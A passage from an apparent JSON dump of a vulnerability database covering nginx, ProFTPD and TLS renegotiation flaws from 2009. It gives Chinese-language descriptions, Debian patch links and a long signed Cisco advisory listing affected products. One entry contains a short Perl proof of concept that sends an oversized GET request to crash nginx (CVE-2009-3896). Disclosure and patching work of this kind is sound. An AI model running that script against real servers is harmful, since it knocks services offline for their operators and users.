ia32)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny3_i386.deb\r\nSize/MD5 checksum: 255294 c7e061bcc8d9272abd91c522e01e05dd\r\n\r\nia64 architecture (Intel ia64)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny3_ia64.deb\r\nSize/MD5 checksum: 420106 3356229c7f62e64c19dd3c3853cb7a87\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny3_mips.deb\r\nSize/MD5 checksum: 283362 9c97f75512a4665c60e20f8fcfff6556\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny3_mipsel.deb\r\nSize/MD5 checksum: 283598 2ebafc8e613da6d28f09d91e1287055c\r\n\r\npowerpc architecture (PowerPC)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny3_powerpc.deb\r\nSize/MD5 checksum: 276188 9c4e725628b775d77aa3a5ccce16063a\r\n\r\ns390 architecture (IBM S/390)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny3_s390.deb\r\nSize/MD5 checksum: 274074 1bbc736cc9651bfd041042b29096bdfa\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny3_sparc.deb\r\nSize/MD5 checksum: 256738 eca03da76437d58f898a60c9cb5930d7\r\n\r\n\u8865\u4e01\u5b89\u88c5\u65b9\u6cd5\uff1a\r\n\r\n1. \u624b\u5de5\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u4e0b\u8f7d\u8865\u4e01\u8f6f\u4ef6\uff1a\r\n # wget url (url\u662f\u8865\u4e01\u4e0b\u8f7d\u94fe\u63a5\u5730\u5740)\r\n\r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u5b89\u88c5\u8865\u4e01\uff1a \r\n # dpkg -i file.deb (file\u662f\u76f8\u5e94\u7684\u8865\u4e01\u540d)\r\n\r\n2. \u4f7f\u7528apt-get\u81ea\u52a8\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u66f4\u65b0\u5185\u90e8\u6570\u636e\u5e93\uff1a\r\n # apt-get update\r\n \r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u5b89\u88c5\u66f4\u65b0\u8f6f\u4ef6\u5305\uff1a\r\n # apt-get upgrade", "published": "2009-11-27T00:00:00", "type": "seebug", "title": "nginx ngx_http_process_request_headers()\u51fd\u6570\u7a7a\u6307\u9488\u5f15\u7528\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3896"], "modified": "2009-11-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-14982", "id": "SSV:14982", "sourceData": "\n here is POC:\r\n\r\n#!/usr/bin/perl\r\nuse IO::Socket;\r\nif ($#ARGV != 0) {\r\nprint "Usage: ./nginx.pl <hostname>\\n";\r\nexit;}\r\n$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],\r\nPeerPort => '80',\r\nProto => 'tcp');\r\n$mysize = 4079;\r\n$mymsg = "o" x $mysize;\r\nprint $sock "GET /$mymsg HTTP/1.1\\r\\n\\r\\n";\r\n\r\nwhile(<$sock>) {\r\nprint;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-14982", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:37:06", "description": "Bugraq ID: 36384\r\nCVE ID\uff1aCVE-2009-2629\r\n\r\nnginx\u662f\u4e00\u6b3e\u9ad8\u6027\u80fd\u7684HTTP \u548c\u53cd\u5411\u4ee3\u7406\u670d\u52a1\u5668\u3002\r\nnginx\u5904\u7406\u7279\u6b8a\u6784\u5efa\u7684URIs\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4ee5\u5e94\u7528\u7a0b\u5e8f\u7a0b\u5e8f\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\u5f53\u5904\u7406\u7279\u6b8a\u6784\u5efa\u7684URIs\u65f6ngx_http_parse_complex_uri()\u51fd\u6570\u5b58\u5728\u7f13\u51b2\u533a\u4e0b\u6ea2\u9519\u8bef\uff0c\u53ef\u5bfc\u81f4nginx\u670d\u52a1\u5668\u628aURI\u4e2d\u7684\u6570\u636e\u5728\u5206\u914d\u7f13\u51b2\u533a\u524d\u5c31\u5199\u5165\u5230\u5806\u5185\u5b58\u4e2d\uff0c\u53ef\u5bfc\u81f4\u4ee5\u670d\u52a1\u8fdb\u7a0b\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\n\nIgor Sysoev nginx 0.8.14\r\nIgor Sysoev nginx 0.7.61\r\nIgor Sysoev nginx 0.6.38\r\nIgor Sysoev nginx 0.5.37\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\nDebian linux\u7528\u6237\u53ef\u5347\u7ea7\u5230\u5982\u4e0b\u7248\u672c\uff1a\r\nDebian Linux 4.0 ia-32\r\nDebian nginx_0.4.13-2+etch2_i386.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_i386.deb\r\nDebian Linux 5.0 hppa\r\nDebian nginx_0.6.32-3+lenny2_hppa.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_hppa.deb\r\nDebian Linux 5.0 ia-64\r\nDebian nginx_0.6.32-3+lenny2_ia64.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_ia64.deb\r\nDebian Linux 4.0 hppa\r\nDebian nginx_0.4.13-2+etch2_hppa.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_hppa.deb\r\nDebian Linux 4.0 sparc\r\nDebian nginx_0.4.13-2+etch2_sparc.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_sparc.deb\r\nDebian Linux 4.0 s/390\r\nDebian nginx_0.4.13-2+etch2_s390.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_s390.deb\r\nDebian Linux 5.0 arm\r\nDebian nginx_0.6.32-3+lenny2_arm.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_arm.deb\r\nDebian Linux 4.0 powerpc\r\nDebian nginx_0.4.13-2+etch2_powerpc.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_powerpc.deb\r\nDebian Linux 4.0 mipsel\r\nDebian nginx_0.4.13-2+etch2_mipsel.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_mipsel.deb\r\nDebian Linux 5.0 alpha\r\nDebian nginx_0.6.32-3+lenny2_alpha.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_alpha.deb\r\nDebian Linux 5.0 amd64\r\nDebian nginx_0.6.32-3+lenny2_amd64.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_amd64.deb\r\nDebian Linux 5.0 ia-32\r\nDebian nginx_0.6.32-3+lenny2_i386.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_i386.deb\r\nDebian Linux 5.0 mips\r\nDebian nginx_0.6.32-3+lenny2_mips.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_mips.deb\r\nDebian Linux 5.0 mipsel\r\nDebian nginx_0.6.32-3+lenny2_mipsel.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_mipsel.deb\r\nDebian Linux 5.0 powerpc\r\nDebian nginx_0.6.32-3+lenny2_powerpc.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_powerpc.deb\r\nDebian Linux 4.0 ia-64\r\nDebian nginx_0.4.13-2+etch2_ia64.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_ia64.deb\r\nDebian Linux 4.0 mips\r\nDebian nginx_0.4.13-2+etch2_mips.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_mips.deb\r\nDebian Linux 5.0 sparc\r\nDebian nginx_0.6.32-3+lenny2_sparc.deb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_sparc.deb", "published": "2009-09-18T00:00:00", "title": "nginx HTTP\u8bf7\u6c42\u8fdc\u7a0b\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2629"], "modified": "2009-09-18T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12337", "id": "SSV:12337", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:25:52", "description": "CVE ID: CVE-2009-3555\r\n\r\nProFTPD\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801FTP\u670d\u52a1\u7a0b\u5e8f\u3002\r\n\r\nProFTPD\u7684\u6a21\u5757mod_tls\u5b58\u5728OpenSSL\u7684\u4f1a\u8bdd\u53ef\u91cd\u65b0\u534f\u5546\u9009\u9879\u7684\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u4f1a\u8bdd\u6570\u636e\u6d41\u4e2d\u63d2\u5165\u660e\u6587\u6570\u636e\uff0c\u64cd\u7eb5\u6570\u636e\u4ea4\u4e92\u3002\n\nProFTPD Project ProFTPD 1.3.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nProFTPD Project\r\n---------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.proftpd.org/docs/RELEASE_NOTES-1.3.2c", "published": "2009-12-15T00:00:00", "type": "seebug", "title": "ProFTPD TLS\u4f1a\u8bdd\u91cd\u534f\u5546\u660e\u6587\u6570\u636e\u6ce8\u5165\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3555"], "modified": "2009-12-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15088", "id": "SSV:15088", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:30:52", "description": "No description provided by source.", "published": "2009-11-10T00:00:00", "type": "seebug", "title": "Cisco Security Advisory: Transport Layer Security Renegotiation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3555"], "modified": "2009-11-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12600", "id": "SSV:12600", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCisco Security Advisory: Transport Layer Security Renegotiation\r\nVulnerability\r\n\r\nAdvisory ID: cisco-sa-20091109-tls\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml\r\n\r\nRevision 1.0\r\n\r\nFor Public Release 2009 November 9 1600 UTC (GMT)\r\n\r\nSummary\r\n=======\r\n\r\nAn industry-wide vulnerability exists in the Transport Layer Security\r\n(TLS) protocol that could impact any Cisco product that uses any version\r\nof TLS and SSL. The vulnerability exists in how the protocol handles\r\nsession renegotiation and exposes users to a potential man-in-the-middle\r\nattack.\r\n\r\nThis advisory is posted at\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml.\r\n\r\nAffected Products\r\n=================\r\n\r\nCisco is currently evaluating products for possible exposure to these\r\nTLS issues. Products will only be listed in the Vulnerable Products or\r\nProducts Confirmed Not Vulnerable sections of this advisory when a final\r\ndetermination about product exposure is made. Products that are not\r\nlisted in either of these two sections are still being evaluated.\r\n\r\nVulnerable Products\r\n- -------------------\r\n\r\nThis section will be updated when more information is available.\r\n\r\nProducts Confirmed Not Vulnerable\r\n- ---------------------------------\r\n\r\nThe following products are confirmed not vulnerable:\r\n\r\n * Cisco AnyConnect VPN Client\r\n\r\nThis section will be updated when more information is available.\r\n\r\nDetails\r\n=======\r\n\r\nTLS and its predecessor, SSL, are cryptographic protocols that provide\r\nsecurity for communications over IP data networks such as the Internet.\r\nAn industry-wide vulnerability exists in the TLS protocol that could\r\nimpact any Cisco product that uses any version of TLS and SSL. The\r\nvulnerability exists in how the protocol handles session renegotiation\r\nand exposes users to a potential man-in-the-middle attack.\r\n\r\nThe following Cisco Bug IDs are being used to track potential exposure\r\nto the SSL and TLS issues. The bugs listed below do not confirm\r\nthat a product is vulnerable, but rather that the product is under\r\ninvestigation by the appropriate product teams.\r\n\r\nRegistered Cisco customers can view these bugs via Cisco's Bug Toolkit:\r\nhttp://www.cisco.com/pcgi-bin/Support/Bugtool/launch_bugtool.pl\r\n\r\n+------------------------------------------------------------+\r\n| Product | Bug ID |\r\n|----------------------------+-------------------------------|\r\n| Cisco Adaptive Security | CSCtd01491 |\r\n| Device Manager (ASDM) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AON Software | CSCtd01646 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AON Healthcare for | CSCtd01652 |\r\n| HIPAA and ePrescription | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Application and | CSCtd01529 |\r\n| Content Networking System | |\r\n| (ACNS) Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Application | CSCtd01480 |\r\n| Networking Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ASA 5500 Series | CSCtd00697 |\r\n| Adaptive Security | |\r\n| Appliances | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ASA Advanced | |\r\n| Inspection and Prevention | CSCtd01539 |\r\n| (AIP) Security Services | |\r\n| Module | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AVS 3100 Series | CSCtd01566 |\r\n| Application Velocity | |\r\n| System | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Catalyst 6500 Series | CSCtd06389 |\r\n| SSL Services Module | |\r\n|----------------------------+-------------------------------|\r\n| Firewall Services Module | CSCtd04061 |\r\n| FWSM | |\r\n|----------------------------+-------------------------------|\r\n| Cisco CSS 11000 Series | CSCtd01636 |\r\n| Content Services Switches | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified SIP Phones | CSCtd01446 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Data Center Network | CSCtd02635 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Data Mobility | CSCtd02642 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01703 |\r\n| Encoders | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01692 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01718 |\r\n| Players | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Emergency Responder | CSCtd02650 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS Software | CSCtd00658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS XE Software | CSCtd00658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS XR Software | CSCtd02658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IP Communicator | CSCtd02662 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| CATOS | CSCtd00662 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IronPort Appliances | CSCtd02069 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified MeetingPlace | CSCtd02709 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Appliance (Clean | CSCtd01453 |\r\n| Access) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Guest Server | CSCtd01462 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Profiler | CSCtd02716 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Analysis | CSCtd02729 |\r\n| Module Software (NAM) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Registrar | CSCtd02748 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ONS 15500 Series | CSCtd02769 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Access | CSCtd02777 |\r\n| Gateways | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Access | CSCtd03912 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Security | CSCtd03920 |\r\n| ISM | |\r\n|----------------------------+-------------------------------|\r\n| Cisco QoS Device Manager | CSCtd03923 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Access | CSCtd00725 |\r\n| Control Server (ACS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Desktop | CSCtd03928 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Services | CSCtd03935 |\r\n| Client | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Security Agent CSA | CSCtd02689 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Security Monitoring, | CSCtd02654 |\r\n| Analysis and Response | |\r\n| System (MARS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified IP Phones | CSCtd04121 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Service Control | CSCtd04171 |\r\n| Subscriber Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco TelePresence Manager | CSCtd01771 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Telepresence for Consumer | CSCtd01752 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco TelePresence | CSCtd01742 |\r\n| Recording Server | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Asset | CSCtd04198 |\r\n| Collector | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified | CSCtd01282 |\r\n| Communications Manager | |\r\n| (CallManager) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Business | CSCtd05731 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Enterprise | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Express | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05755 |\r\n| Center Management Portal | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Products | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Department | CSCtd05733 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified E-Mail | CSCtd05756 |\r\n| Interaction Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Enterprise | CSCtd05735 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobile | CSCtd05762 |\r\n| Communicator | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobility | CSCtd05786 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobility | CSCtd05783 |\r\n| Advantage | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Operations | CSCtd05784 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Personal | CSCtd05759 |\r\n| Communicator | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Presence | CSCtd05791 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Provisioning | CSCtd05777 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Quick | CSCtd05738 |\r\n| Connect | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Service | CSCtd05780 |\r\n| Monitor | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Service | CStCd05778 |\r\n| Statistics Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified SIP Proxy | CSCtd05765 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unity | CSCtd02855 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NX-OS Software | CSCtd00699 and CSCtd00703 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Portal | CSCtd04097 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Surveillance | CSCtd02831 |\r\n| Media Server Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Surveillance | CSCtd02780 |\r\n| Operations Manager | |\r\n| Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wide Area File | CSCtd04106 |\r\n| Services Software (WAFS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless Control | CSCtd01625 |\r\n| System | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless LAN | CSCtd01611 |\r\n| Controller (WLAN) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless Location | CSCtd04115 |\r\n| Appliance | |\r\n|----------------------------+-------------------------------|\r\n| CiscoWorks Common Services | CSCtd01597 |\r\n| Software | |\r\n|----------------------------+-------------------------------|\r\n| CiscoWorks Wireless LAN | CSCtd04111 |\r\n| Solution Engine (WLSE) | |\r\n+------------------------------------------------------------+\r\n\r\nThis vulnerability has been assigned the Common Vulnerabilities and\r\nExposures (CVE) identifier CVE-2009-3555.\r\n\r\n\r\nVulnerability Scoring Details\r\n+----------------------------\r\n\r\nCisco has provided scores for the vulnerability in this advisory based\r\non the Common Vulnerability Scoring System (CVSS). The CVSS scoring in\r\nthis Security Advisory is done in accordance with CVSS version 2.0.\r\n\r\nCVSS is a standards-based scoring method that conveys vulnerability\r\nseverity and helps determine urgency and priority of response.\r\n\r\nCisco has provided a base and temporal score. Customers can then\r\ncompute environmental scores to assist in determining the impact of the\r\nvulnerability in individual networks.\r\n\r\nCisco has provided an FAQ to answer additional questions regarding CVSS\r\nat:\r\n\r\nhttp://www.cisco.com/web/about/security/intelligence/cvss-qandas.html\r\n\r\nCisco has also provided a CVSS calculator to help compute the\r\nenvironmental impact for individual networks at:\r\n\r\nhttp://intellishield.cisco.com/security/alertmanager/cvss\r\n\r\n* TLS Renegotiation Vulnerability (all Cisco Bugs above)\r\n\r\nCVSS Base Score - 4.3\r\n Access Vector - Network\r\n Access Complexity - Medium\r\n Authentication - None\r\n Confidentiality Impact - None\r\n Integrity Impact - Partial\r\n Availability Impact - None\r\n\r\nCVSS Temporal Score - 4.1\r\n Exploitability - Functional\r\n Remediation Level - Unavailable\r\n Report Confidence - Confirmed\r\n\r\n\r\nImpact\r\n======\r\n\r\nThis section will be updated when more information is available.\r\n\r\nSoftware Versions and Fixes\r\n===========================\r\n\r\nThis section will be updated to include fixed software versions for\r\naffected Cisco products as they become available.\r\n\r\nWorkarounds\r\n===========\r\n\r\nWorkarounds are being investigated. This section will be updated when\r\nmore information becomes available.\r\n\r\nObtaining Fixed Software\r\n========================\r\n\r\nCisco has released free software updates that address this\r\nvulnerability. Prior to deploying software, customers should consult\r\ntheir maintenance provider or check the software for feature set\r\ncompatibility and known issues specific to their environment.\r\n\r\nCustomers may only install and expect support for the feature\r\nsets they have purchased. By installing, downloading, accessing\r\nor otherwise using such software upgrades, customers agree to be\r\nbound by the terms of Cisco's software license terms found at\r\nhttp://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,\r\nor as otherwise set forth at Cisco.com Downloads at\r\nhttp://www.cisco.com/public/sw-center/sw-usingswc.shtml.\r\n\r\nDo not contact psirt@cisco.com or security-alert@cisco.com for software\r\nupgrades.\r\n\r\nCustomers with Service Contracts\r\n- --------------------------------\r\n\r\nCustomers with contracts should obtain upgraded software through their\r\nregular update channels. For most customers, this means that upgrades\r\nshould be obtained through the Software Center on Cisco's worldwide\r\nwebsite at http://www.cisco.com.\r\n\r\nCustomers using Third Party Support Organizations\r\n- -------------------------------------------------\r\n\r\nCustomers whose Cisco products are provided or maintained through prior\r\nor existing agreements with third-party support organizations, such\r\nas Cisco Partners, authorized resellers, or service providers should\r\ncontact that support organization for guidance and assistance with the\r\nappropriate course of action in regards to this advisory.\r\n\r\nThe effectiveness of any workaround or fix is dependent on specific\r\ncustomer situations, such as product mix, network topology, traffic\r\nbehavior, and organizational mission. Due to the variety of affected\r\nproducts and releases, customers should consult with their service\r\nprovider or support organization to ensure any applied workaround or fix\r\nis the most appropriate for use in the intended network before it is\r\ndeployed.\r\n\r\nCustomers without Service Contracts\r\n- -----------------------------------\r\n\r\nCustomers who purchase direct from Cisco but do not hold a Cisco service\r\ncontract, and customers who purchase through third-party vendors but are\r\nunsuccessful in obtaining fixed software through their point of sale\r\nshould acquire upgrades by contacting the Cisco Technical Assistance\r\nCenter (TAC). TAC contacts are as follows.\r\n\r\n * +1 800 553 2447 (toll free from within North America)\r\n * +1 408 526 7209 (toll call from anywhere in the world)\r\n * e-mail: tac@cisco.com\r\n\r\nCustomers should have their product serial number available and be\r\nprepared to give the URL of this notice as evidence of entitlement to a\r\nfree upgrade. Free upgrades for non-contract customers must be requested\r\nthrough the TAC.\r\n\r\nRefer to\r\nhttp://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html\r\nfor additional TAC contact information, including localized telephone\r\nnumbers, and instructions and e-mail addresses for use in various\r\nlanguages.\r\n\r\nExploitation and Public Announcements\r\n=====================================\r\n\r\nThis vulnerability was initially discovered by Marsh Ray and Steve\r\nDispensa from PhoneFactor, Inc.\r\n\r\nCisco is not aware of any malicious exploitation of this vulnerability.\r\n\r\nProof-of-concept exploit code has been published for this vulnerability.\r\n\r\nStatus of this Notice: INTERIM\r\n==============================\r\n\r\nTHIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY\r\nANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF\r\nMERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE\r\nINFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS\r\nAT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS\r\nDOCUMENT AT ANY TIME.\r\n\r\nA stand-alone copy or Paraphrase of the text of this document that omits\r\nthe distribution URL in the following section is an uncontrolled copy,\r\nand may lack important information or contain factual errors.\r\n\r\nDistribution\r\n============\r\n\r\nThis advisory is posted on Cisco's worldwide website at:\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml\r\n\r\nIn addition to worldwide web posting, a text version of this notice is\r\nclear-signed with the Cisco PSIRT PGP key and is posted to the following\r\ne-mail and Usenet news recipients.\r\n\r\n * cust-security-announce@cisco.com\r\n * first-bulletins@lists.first.org\r\n * bugtraq@securityfocus.com\r\n * vulnwatch@vulnwatch.org\r\n * cisco@spot.colorado.edu\r\n * cisco-nsp@puck.nether.net\r\n * full-disclosure@lists.grok.org.uk\r\n * comp.dcom.sys.cisco@newsgate.cisco.com\r\n\r\nFuture updates of this advisory, if any, will be placed on Cisco's\r\nworldwide website, but may or may not be actively announced on mailing\r\nlists or newsgroups. Users concerned about this problem are encouraged\r\nto check the above URL for any updates.\r\n\r\nRevision History\r\n================\r\n\r\n+------------------------------------------------------------+\r\n| Revision 1.0 | 2009-November-9 | Initial public release |\r\n+------------------------------------------------------------+\r\n\r\nCisco Security Procedures\r\n=========================\r\n\r\nComplete information on reporting security vulnerabilities\r\nin Cisco products, obtaining assistance with security\r\nincidents, and registering to receive security information\r\nfrom Cisco, is available on Cisco's worldwide website at\r\nhttp://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.\r\nThis includes instructions for press inquiries regarding\r\nCisco security notices. All Cisco security advisories are available at\r\nhttp://www.cisco.com/go/psirt.\r\n\r\n+--------------------------------------------------------------------\r\nCopyright 2008-2009 Cisco Systems, Inc. All rights reserved.\r\n+--------------------------------------------------------------------\r\n\r\nUpdated: Nov 09, 2009 Document ID: 111046\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niEYEARECAAYFAkr4TCsACgkQ86n/Gc8U/uDNWgCfYptXVZhz0qn2DvRh2zUtZ5EF\r\nOS4AoJediPm3/t9XqYIdrjR5PNP25iY/\r\n=SkAu\r\n-----END PGP 